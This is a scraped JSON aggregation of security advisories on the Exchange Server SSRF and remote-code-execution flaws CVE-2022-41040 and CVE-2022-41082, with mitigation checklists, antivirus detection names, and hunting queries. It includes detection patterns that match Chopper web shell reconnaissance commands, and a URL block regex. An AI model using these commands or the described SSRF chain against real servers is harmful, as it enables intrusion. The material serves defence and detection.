\n[Trojan:Win32/WebShellTerminal.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/WebShellTerminal.B&threatId=-2147138186>) | Execution \n \n### Microsoft Defender for Endpoint\n\n[Microsoft Defender for Endpoint](<https://www.microsoft.com/en-us/security/business/endpoint-security/microsoft-defender-endpoint>) detects post-exploitation activity. The following alerts could be related to this threat:\n\n**Indicators of attack******| **MITRE** **ATT&amp;CK Tactics observed ** \n---|--- \nPossible web shell installation | Persistence \nPossible IIS web shell | Persistence \nSuspicious Exchange Process Execution | Execution \nPossible exploitation of Exchange Server vulnerabilities (Requires Exchange AMSI to be enabled)| Initial Access \nSuspicious processes indicative of a web shell | Persistence \nPossible IIS compromise | Initial Access \n \nAs of this writing, Defender for Endpoint customers with Microsoft Defender Antivirus enabled can also detect the web shell malware used in in-the-wild exploitation of this vulnerability with the following alerts:\n\n**Indicators of attack******| **MITRE ATT&amp;CK Tactics observed ** \n---|--- \n&#x27;Chopper&#x27; malware was detected on an IIS Web server | Persistence \n&#x27;Chopper&#x27; high-severity malware was detected | Persistence \n \n### Microsoft Defender Threat Intelligence\n\n[Microsoft Defender Threat Intelligence](<https://www.microsoft.com/en-us/security/business/siem-and-xdr/microsoft-defender-threat-intelligence>) (MDTI) maps the internet to expose threat actors and their infrastructure. As indicators of compromise (IOCs) associated with threat actors targeting the vulnerabilities described in this writeup are surfaced, Microsoft Defender Threat Intelligence Community members and customers can find summary and enrichment information for all IOCs within the Microsoft Defender Threat Intelligence portal.\n\n### Microsoft Defender Vulnerability Management\n\nMicrosoft Defender Vulnerability Management identifies devices in an associated tenant environment that might be affected by CVE-2022-41040 and CVE-2022-41082. These vulnerabilities have been added to the CISA known exploited vulnerabilities list and are considered in the overall organizational [exposure score](<https://learn.microsoft.com/en-us/microsoft-365/security/defender-vulnerability-management/tvm-exposure-score?view=o365-worldwide>). Customers can use the following capabilities to identify vulnerable devices and assess exposure:\n\n * Use the dedicated dashboard for each of CVE-2022-41040 and CVE-2022-41082 to get a consolidated view of various findings across vulnerable devices and software.\n * Use the _DeviceTvmSoftwareVulnerabilities_ table in advanced hunting to identify vulnerabilities in installed software on devices. Refer to the following query to run:\n \n \n DeviceTvmSoftwareVulnerabilities\n | where CveId in (\"CVE-2022-41040\", \"CVE-2022-41082\")\n \n\nFigure 2: Screenshot of the CVE information page where users can also take a look at related exposed device, software information, open vulnerability page, report inaccuracy, or read other useful references.\n\nNOTE: The assessments above do not currently account for the existence of a workaround mitigation on the device. Microsoft will continue to improve these capabilities based on the latest information from the threat landscape.\n\n## Advanced hunting\n\n### Microsoft Sentinel\n\nBased on what we\u2019re seeing in the wild, Microsoft Sentinel customers can use the following techniques for web shell-related attacks connected to these vulnerabilities. Our post on [web shell threat hunting with Microsoft Sentinel](<https://techcommunity.microsoft.com/t5/microsoft-sentinel-blog/web-shell-threat-hunting-with-azure-sentinel/ba-p/2234968>) also provides guidance on looking for web shells in general. \n\nThe [Exchange SSRF Autodiscover ProxyShell](<https://github.com/Azure/Azure-Sentinel/blob/08a8d2b9c5c9083e341be447773a34b56b205dee/Detections/W3CIISLog/ProxyShellPwn2Own.yaml>) detection, which was created in response to ProxyShell, can be used for queries due to functional similarities with this threat. Also, the new [Exchange Server Suspicious File Downloads](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/http_proxy_oab_CL/ExchagngeSuspiciousFileDownloads.yaml>) and [Exchange Worker Process Making Remote Call](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/ExchangeWorkerProcessMakingRemoteCall.yaml>) queries specifically look for suspicious downloads or activity in IIS logs. In addition to these, we have a few more that could be helpful in looking for post-exploitation activity:\n\n * [Exchange OAB virtual directory attribute containing potential web shell](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/ExchangeOABVirtualDirectoryAttributeContainingPotentialWebshell.yaml>) \n * [Web shell activity](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/W3CIISLog/WebShellActivity.yaml>) \n * [Malicious web application requests linked with Microsoft Defender for Endpoint alerts](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/W3CIISLog/MaliciousAlertLinkedWebRequests.yaml>) \n * [Exchange IIS worker dropping web shell](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Execution/exchange-iis-worker-dropping-webshell.yaml>) \n * [Web shell detection](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/W3CIISLog/PotentialWebshell.yaml>) \n\n### Microsoft 365 Defender\n\nTo locate related activity, Microsoft 365 Defender customers can run the following advanced hunting queries:\n\n**Chopper web shell**\n\nUse this query to hunt for Chopper web shell activity:\n \n \n DeviceProcessEvents\n | where InitiatingProcessFileName =~ \"w3wp.exe\"\n | where ProcessCommandLine has_any (\"&ipconfig&echo\", \"&quser&echo\", \"&whoami&echo\", \"&c:&echo\", \"&cd&echo\", \"&dir&echo\", \"&echo [E]\", \"&echo [S]\")\n \n\n**Suspicious files in Exchange directories**\n\nUse this query to hunt for suspicious files in Exchange directories:\n \n \n DeviceFileEvents\n | where Timestamp >= ago(7d)\n | where InitiatingProcessFileName == \"w3wp.exe\"\n | where FolderPath has \"FrontEnd\\\\HttpProxy\\\\\"\n | where InitiatingProcessCommandLine contains \"MSExchange\"\n | project FileName,FolderPath,SHA256, InitiatingProcessCommandLine, DeviceId, Timestamp\n\n## External attack surface management\n\n### Microsoft Defender External Attack Surface Management\n\n[Microsoft Defender External Attack Surface Management](<https://www.microsoft.com/en-us/security/business/cloud-security/microsoft-defender-external-attack-surface-management>) continuously discovers and maps your digital attack surface to provide an external view of your online infrastructure. Attack Surface Insights are generated by leveraging vulnerability and infrastructure data to showcase the key areas of concern for your organization.\n\nA High Severity Observation has been published to surface assets within an attack surface which should be examined for application of the mitigation steps described above. This insight, titled _CVE-2022-41082 &amp; CVE-2022-41040 - Microsoft Exchange Server Authenticated SSRF and PowerShell RCE_, can be found under the high severity observations section of the Attack Surface Summary dashboard.\n\nThe post [Analyzing attacks using the Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082](<https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-01T04:21:00", "type": "mssecure", "title": "Analyzing attacks using the Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-01T04:21:00", "id": "MSSECURE:C857BFAD4920FD5B25BF42D5469945F6", "href": "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", "cvss": {"score": 0.0, "vector": "NONE"}}], "mmpc": [{"lastseen": "2022-10-07T17:04:51", "description": "> **October 1, 2022** **update** \u2013 Added information about _Exploit:Script/ExchgProxyRequest.A_, Microsoft Defender AV\u2019s robust detection for exploit behavior related to this threat. We also removed a section on MFA as a mitigation, which was included in a prior version of this blog as standard guidance. \n\nMicrosoft is aware of [limited targeted attacks](<https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>) using two reported zero-day vulnerabilities affecting Microsoft Exchange Server 2013, Exchange Server 2016, and Exchange Server 2019. The first one, identified as CVE-2022-41040, is a server-side request forgery (SSRF) vulnerability, while the second one, identified as CVE-2022-41082, allows remote code execution (RCE) when Exchange PowerShell is accessible to the attacker. Refer to the [Microsoft Security Response Center blog](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) for mitigation guidance regarding these vulnerabilities. \n\nCVE-2022-41040 can enable an authenticated attacker to remotely trigger CVE-2022-41082. However, authenticated access to the vulnerable Exchange Server is necessary to successfully exploit either vulnerability, and they can be used separately.\n\nMicrosoft Defender Antivirus and Microsoft Defender for Endpoint detect malware and activity associated with these attacks. Microsoft will continue to monitor threats that take advantage of these vulnerabilities and take necessary response actions to protect customers.\n\n## Analysis of observed activity\n\n### Attacks using Exchange vulnerabilities prior to public disclosure\n\nMSTIC observed activity related to a single activity group in August 2022 that achieved initial access and compromised Exchange servers by chaining CVE-2022-41040 and CVE-2022-41082 in a small number of targeted attacks. These attacks installed the Chopper web shell to facilitate hands-on-keyboard access, which the attackers used to perform Active Directory reconnaissance and data exfiltration. Microsoft observed these attacks in fewer than 10 organizations globally. MSTIC assesses with medium confidence that the single activity group is likely to be a state-sponsored organization.\n\nMicrosoft researchers were investigating these attacks to determine if there was a new exploitation vector in Exchange involved when the Zero Day Initiative (ZDI) disclosed CVE-2022-41040 and CVE-2022-41082 to Microsoft Security Response Center (MSRC) in September 2022.\n\nFigure 1: Diagram of attacks using Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082\n\n### Observed activity after public disclosure\n\nOn September 28, 2022, GTSC released a [blog](<https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>) disclosing an exploit previously reported to Microsoft via the Zero Day Initiative and detailing its use in an attack in the wild. Their blog details one example of chained exploitation of CVE-2022-41040 and CVE-2022-41082 and discusses the exploitation details of CVE-2022-41040. It is expected that similar threats and overall exploitation of these vulnerabilities will increase, as security researchers and cybercriminals adopt the published research into their toolkits and proof of concept code becomes available.\n\nWhile these vulnerabilities require authentication, the authentication needed for exploitation can be that of a standard user. Standard user credentials can be acquired via many different attacks, such as password spray or purchase via the cybercriminal economy. Prior Exchange vulnerabilities that require authentication have been adopted into the toolkits of attackers who deploy ransomware, and these vulnerabilities are likely to be included in similar attacks due to the highly privileged access Exchange systems confer onto an attacker.\n\n## Mitigation\n\nCustomers should refer to [Microsoft Security Response Center\u2019s post](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) for the latest on mitigations for the Exchange product.\n\nMicrosoft Exchange Server customers using [Microsoft 365 Defender](<https://www.microsoft.com/en-us/security/business/siem-and-xdr/microsoft-365-defender>) are advised to follow this checklist:\n\n * Turn on [cloud-delivered protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?view=o365-worldwide>) in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.\n * Turn on [tamper protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) features to prevent attackers from stopping security services.\n * Run [EDR in block mode](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide>) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus doesn\u2019t detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.\n * Enable [network protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/enable-network-protection?view=o365-worldwide>) to prevent applications or users from accessing malicious domains and other malicious content on the internet.\n * Enable [investigation and remediation](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide>) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.\n * Use [device discovery](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/device-discovery?view=o365-worldwide>) to increase your visibility into your network by finding unmanaged devices on your network and onboarding them to Microsoft Defender for Endpoint.\n\n## Detection\n\n### Microsoft Defender Antivirus\n\n**Microsoft Exchange AMSI integration and Antivirus Exclusions**\n\nExchange supports the integration with the Antimalware Scan Interface (AMSI) since the June 2021 Quarterly Updates for Exchange. It is highly recommended to ensure these updates are installed and AMSI is working using the [guidance provided by the Exchange Team](<https://techcommunity.microsoft.com/t5/exchange-team-blog/more-about-amsi-integration-with-exchange-server/bc-p/2576429/highlight/true>), as this integration provides the best ability for Defender Antivirus to detect and block exploitation of vulnerabilities on Exchange. \n\nMany organizations exclude Exchange directories from antivirus scans for performance reasons. It\u2019s highly recommended to audit AV exclusions on Exchange systems and assess if they can be removed without impacting performance and still ensure the highest level of protection. Exclusions can be managed via Group Policy, PowerShell, or systems management tools like System Center Configuration Manager.\n\nTo audit AV exclusions on an Exchange Server running Defender Antivirus, launch the _Get-MpPreference_ command from an elevated PowerShell prompt.\n\nIf exclusions cannot be removed for Exchange processes and folders, running Quick Scan in Defender Antivirus scans Exchange directories and files regardless of exclusions.\n\nMicrosoft Defender Antivirus detects the post-exploitation malware currently used in-the-wild exploitation of this vulnerability as the following:\n\n**Microsoft Defender Antivirus detections ******| **MITRE** **ATT&amp;CK Tactics observed ** \n---|--- \n[Exploit:Script/ExchgProxyRequest.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Script/ExchgProxyRequest.A&threatId=-2147134610>) \n[Exploit:Script/ExchgProxyRequest.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Script/ExchgProxyRequest.B&threatId=-2147134593>) \n[Exploit:Script/ExchgProxyRequest.C](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Script/ExchgProxyRequest.C&threatId=-2147134381>) \n(the most robust defense from Microsoft Defender AV against this threat; requires Exchange AMSI to be enabled)| Initial Access \n[Backdoor:ASP/Webshell.Y](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:ASP/Webshell.Y>)| Persistence \n[Backdoor:Win32/RewriteHttp.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Win32/RewriteHttp.A>)| Persistence \n[Backdoor:JS/SimChocexShell.A!dha](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:JS/SimChocexShell.A!dha&threatId=-2147134707>)| Persistence \n[Behavior:Win32/IISExchgDropWebshell.A!dha](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/IISExchgDropWebshell.A!dha&threatId=-2147189378>)| Persistence \nBehavior:Win32/IISExchgDropWebshell.A | Persistence \n[Trojan:Win32/IISExchgSpawnCMD.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/IISExchgSpawnCMD.A&threatId=-2147190657>)| Execution \n[Trojan:Win32/WebShellTerminal.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/WebShellTerminal.A&threatId=-2147189572>) | Execution \n[Trojan:Win32/WebShellTerminal.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/WebShellTerminal.B&threatId=-2147138186>) | Execution \n \n### Microsoft Defender for Endpoint\n\n[Microsoft Defender for Endpoint](<https://www.microsoft.com/en-us/security/business/endpoint-security/microsoft-defender-endpoint>) detects post-exploitation activity. The following alerts could be related to this threat:\n\n**Indicators of attack******| **MITRE** **ATT&amp;CK Tactics observed ** \n---|--- \nPossible web shell installation | Persistence \nPossible IIS web shell | Persistence \nSuspicious Exchange Process Execution | Execution \nPossible exploitation of Exchange Server vulnerabilities (Requires Exchange AMSI to be enabled)| Initial Access \nSuspicious processes indicative of a web shell | Persistence \nPossible IIS compromise | Initial Access \n \nAs of this writing, Defender for Endpoint customers with Microsoft Defender Antivirus enabled can also detect the web shell malware used in in-the-wild exploitation of this vulnerability with the following alerts:\n\n**Indicators of attack******| **MITRE ATT&amp;CK Tactics observed ** \n---|--- \n&#x27;Chopper&#x27; malware was detected on an IIS Web server | Persistence \n&#x27;Chopper&#x27; high-severity malware was detected | Persistence \n \n### Microsoft Defender Threat Intelligence\n\n[Microsoft Defender Threat Intelligence](<https://www.microsoft.com/en-us/security/business/siem-and-xdr/microsoft-defender-threat-intelligence>) (MDTI) maps the internet to expose threat actors and their infrastructure. As indicators of compromise (IOCs) associated with threat actors targeting the vulnerabilities described in this writeup are surfaced, Microsoft Defender Threat Intelligence Community members and customers can find summary and enrichment information for all IOCs within the Microsoft Defender Threat Intelligence portal.\n\n### Microsoft Defender Vulnerability Management\n\nMicrosoft Defender Vulnerability Management identifies devices in an associated tenant environment that might be affected by CVE-2022-41040 and CVE-2022-41082. These vulnerabilities have been added to the CISA known exploited vulnerabilities list and are considered in the overall organizational [exposure score](<https://learn.microsoft.com/en-us/microsoft-365/security/defender-vulnerability-management/tvm-exposure-score?view=o365-worldwide>). Customers can use the following capabilities to identify vulnerable devices and assess exposure:\n\n * Use the dedicated dashboard for each of CVE-2022-41040 and CVE-2022-41082 to get a consolidated view of various findings across vulnerable devices and software.\n * Use the _DeviceTvmSoftwareVulnerabilities_ table in advanced hunting to identify vulnerabilities in installed software on devices. Refer to the following query to run:\n \n \n DeviceTvmSoftwareVulnerabilities\n | where CveId in (\"CVE-2022-41040\", \"CVE-2022-41082\")\n \n\nFigure 2: Screenshot of the CVE information page where users can also take a look at related exposed device, software information, open vulnerability page, report inaccuracy, or read other useful references.\n\nNOTE: The assessments above do not currently account for the existence of a workaround mitigation on the device. Microsoft will continue to improve these capabilities based on the latest information from the threat landscape.\n\n## Advanced hunting\n\n### Microsoft Sentinel\n\nBased on what we\u2019re seeing in the wild, Microsoft Sentinel customers can use the following techniques for web shell-related attacks connected to these vulnerabilities. Our post on [web shell threat hunting with Microsoft Sentinel](<https://techcommunity.microsoft.com/t5/microsoft-sentinel-blog/web-shell-threat-hunting-with-azure-sentinel/ba-p/2234968>) also provides guidance on looking for web shells in general. \n\nThe [Exchange SSRF Autodiscover ProxyShell](<https://github.com/Azure/Azure-Sentinel/blob/08a8d2b9c5c9083e341be447773a34b56b205dee/Detections/W3CIISLog/ProxyShellPwn2Own.yaml>) detection, which was created in response to ProxyShell, can be used for queries due to functional similarities with this threat. Also, the new [Exchange Server Suspicious File Downloads](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/http_proxy_oab_CL/ExchagngeSuspiciousFileDownloads.yaml>) and [Exchange Worker Process Making Remote Call](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/ExchangeWorkerProcessMakingRemoteCall.yaml>) queries specifically look for suspicious downloads or activity in IIS logs. In addition to these, we have a few more that could be helpful in looking for post-exploitation activity:\n\n * [Exchange OAB virtual directory attribute containing potential web shell](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/ExchangeOABVirtualDirectoryAttributeContainingPotentialWebshell.yaml>) \n * [Web shell activity](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/W3CIISLog/WebShellActivity.yaml>) \n * [Malicious web application requests linked with Microsoft Defender for Endpoint alerts](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/W3CIISLog/MaliciousAlertLinkedWebRequests.yaml>) \n * [Exchange IIS worker dropping web shell](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Execution/exchange-iis-worker-dropping-webshell.yaml>) \n * [Web shell detection](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/W3CIISLog/PotentialWebshell.yaml>) \n\n### Microsoft 365 Defender\n\nTo locate related activity, Microsoft 365 Defender customers can run the following advanced hunting queries:\n\n**Chopper web shell**\n\nUse this query to hunt for Chopper web shell activity:\n \n \n DeviceProcessEvents\n | where InitiatingProcessFileName =~ \"w3wp.exe\"\n | where ProcessCommandLine has_any (\"&ipconfig&echo\", \"&quser&echo\", \"&whoami&echo\", \"&c:&echo\", \"&cd&echo\", \"&dir&echo\", \"&echo [E]\", \"&echo [S]\")\n \n\n**Suspicious files in Exchange directories**\n\nUse this query to hunt for suspicious files in Exchange directories:\n \n \n DeviceFileEvents\n | where Timestamp >= ago(7d)\n | where InitiatingProcessFileName == \"w3wp.exe\"\n | where FolderPath has \"FrontEnd\\\\HttpProxy\\\\\"\n | where InitiatingProcessCommandLine contains \"MSExchange\"\n | project FileName,FolderPath,SHA256, InitiatingProcessCommandLine, DeviceId, Timestamp\n\n## External attack surface management\n\n### Microsoft Defender External Attack Surface Management\n\n[Microsoft Defender External Attack Surface Management](<https://www.microsoft.com/en-us/security/business/cloud-security/microsoft-defender-external-attack-surface-management>) continuously discovers and maps your digital attack surface to provide an external view of your online infrastructure. Attack Surface Insights are generated by leveraging vulnerability and infrastructure data to showcase the key areas of concern for your organization.\n\nA High Severity Observation has been published to surface assets within an attack surface which should be examined for application of the mitigation steps described above. This insight, titled _CVE-2022-41082 &amp; CVE-2022-41040 - Microsoft Exchange Server Authenticated SSRF and PowerShell RCE_, can be found under the high severity observations section of the Attack Surface Summary dashboard.\n\nThe post [Analyzing attacks using the Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082](<https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-01T04:21:00", "type": "mmpc", "title": "Analyzing attacks using the Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-01T04:21:00", "id": "MMPC:C857BFAD4920FD5B25BF42D5469945F6", "href": "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", "cvss": {"score": 0.0, "vector": "NONE"}}], "cert": [{"lastseen": "2022-11-10T03:01:01", "description": "### Overview\n\nMicrosoft Exchange Server 2019, Exchange Server 2016 and Exchange Server 2013 are vulnerable to a server-side request forgery (SSRF) attack and remote code execution. An authenticated attacker can use the combination of these two vulnerabilities to elevate privileges and execute arbitrary code on the target Exchange server. \n\n### Description\n\nMicrosoft Exchange Server's [ Autodiscover service](<https://learn.microsoft.com/en-us/exchange/architecture/client-access/autodiscover?view=exchserver-2019>) is a web service widely available to any Microsoft Exchange Web Services (EWS) client. Since Microsoft Exchange version 2016, the Autodiscover service has become an integral part of the Microsoft Exchange system, and it is no longer independently provided by a Client Access server. The Autodiscover service and a number of other privileged mailbox services are hosted on the default Internet Information Services server running on the Mailbox server. \n\nCybersecurity company GTSC [observed an abuse of the Autodiscover service in August of 2022](<https://www.gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>) using a crafted URL SSRF attack, similar to the earlier [ProxyShell](<https://techcommunity.microsoft.com/t5/exchange-team-blog/proxyshell-vulnerabilities-and-your-exchange-server/ba-p/2684705>) vulnerability reported in August 2021. The observed attack appears to have implemented [CVE-2022-41040](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040>) to gain privileged access and [CVE-2022-41082](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41082>) to perform remote code execution via PowerShell. Microsoft Security Research Center has [acknowledged the vulnerability and provided guidance for mitigation](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>). The guidance highlights that Microsoft Exchange Online customers will be provided with detection and mitigation defenses automatically from Microsoft's managed Infrastructure, informing them of any attempts to exploit these vulnerabilities. \n\n### Impact\n\nAn authenticated remote attacker can perform SSRF attacks to escalate privileges and execute arbtirary PowerShell code on vulnerable Microsoft Exchange servers. As the attack is targeted against Microsoft Exchange Mailbox server, the attacker can potentially gain access to other resources via lateral movement into Exchange and Active Directory environments.\n\n### Solution\n\n#### Workaround guidance\n\nMicrosoft has provided guidance in their [recent blog post](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) to address the issue. Note that Microsoft has updated their guidance for the Option 3 Step 6 with the URL filter to be _.*autodiscover\\\\.json.*Powershell.*_ (excluding the _@_ symbol) instead of the earlier _.*autodiscover\\\\.json.*\\@.*Powershell.*_. The recommended block pattern is a regular expression suggested by [Jang](<https://twitter.com/testanull>) to prevent known variants of the #ProxyNotShell attacks. Microsoft further updated their advisory on October 8th suggesting **Condition Input** should be changed from {URL} to {UrlDecode:{REQUEST_URI}} to ensure all encoded variations are evaluated before being blocked.\n\n#### Apply update when available\n\nAs of October 3, 2022, there is no patch available to mitigate this issue. It is recommended that Microsoft Exchange administrators stay on alert for any advisory or patch released by Microsoft. Note the latest security updates from Microsoft on [October 11th](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-october-2022-exchange-server-security-updates/ba-p/3646263>) **do not** address the vulnerabilities highlighted here. Even with the workaround in place, many on-premise Microsoft Exchange instances remain at risk until Microsoft provides a patch and the patch has been applied.\n\nOn November 8th 2022, Microsoft has provided fixes as part of their Patch Tuesday rollout, see updated Microsoft's guidance at [CVE-2022-41082](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41082>) and [CVE-2022-41040](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040>). \n\n#### Third-party web application protection\n\nExchange Administrators who use third-party Web Application Firewall (WAF) products can implement the recommended URL filters and blocks as part of their WAF policy.\n\n#### Other mitigations\n\nExchange Administrators can limit the outgoing connection from the Exchange Mailbox server using specific allowed list on an outgoing proxy to limit suspicious web requests.\n\nThis document was written by Vijay Sarvepalli.\n\n### Vendor Information\n\n915563\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n### Microsoft Unknown\n\nNotified: 2022-10-03 Updated: 2022-10-03 **CVE-2022-41040**| Unknown \n---|--- \n**CVE-2022-41082**| Unknown \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Microsoft Vulnerability Research Unknown\n\nNotified: 2022-10-03 Updated: 2022-10-04 **CVE-2022-41040**| Unknown \n---|--- \n**CVE-2022-41082**| Unknown \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n \n\n\n### References\n\n * <https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040>\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41082>\n * <https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/>\n * <https://doublepulsar.com/proxynotshell-the-story-of-the-claimed-zero-day-in-microsoft-exchange-5c63d963a9e9>\n * <https://rw.md/2022/11/09/ProxyNotRelay.html>\n\n### Other Information\n\n**CVE IDs:** | [CVE-2022-41040 ](<http://web.nvd.nist.gov/vuln/detail/CVE-2022-41040>) [CVE-2022-41082 ](<http://web.nvd.nist.gov/vuln/detail/CVE-2022-41082>) \n---|--- \n**API URL: ** | VINCE JSON | CSAF \n**Date Public:** | 2022-10-03 \n**Date First Published:** | 2022-10-03 \n**Date Last Updated: ** | 2022-11-10 01:59 UTC \n**Document Revision: ** | 9 \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-03T00:00:00", "type": "cert", "title": "Microsoft Exchange vulnerable to server-side request forgery and remote code execution.", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-11-10T01:59:00", "id": "VU:915563", "href": "https://www.kb.cert.org/vuls/id/915563", "cvss": {"score": 0.0, "vector": "NONE"}}], "impervablog": [{"lastseen": "2022-10-13T02:05:20", "description": "On September 29, Microsoft security researchers announced two new zero-day vulnerabilities, CVE-2022-41040 and CVE-2022-41082 affecting Microsoft Exchange Server. The vulnerabilities allow remote code execution (RCE) when used in tandem. It is important to note that both require authenticated access to the desired server before exploitation. Trend Micro gave the two vulnerabilities severity ratings of 8.8 and 6.3 out of 10, respectively.\n\nAccording to researchers, CVE-2022-41082 is closely related to the [ProxyShell](<https://doublepulsar.com/proxynotshell-the-story-of-the-claimed-zero-day-in-microsoft-exchange-5c63d963a9e9>) vulnerability from 2021, 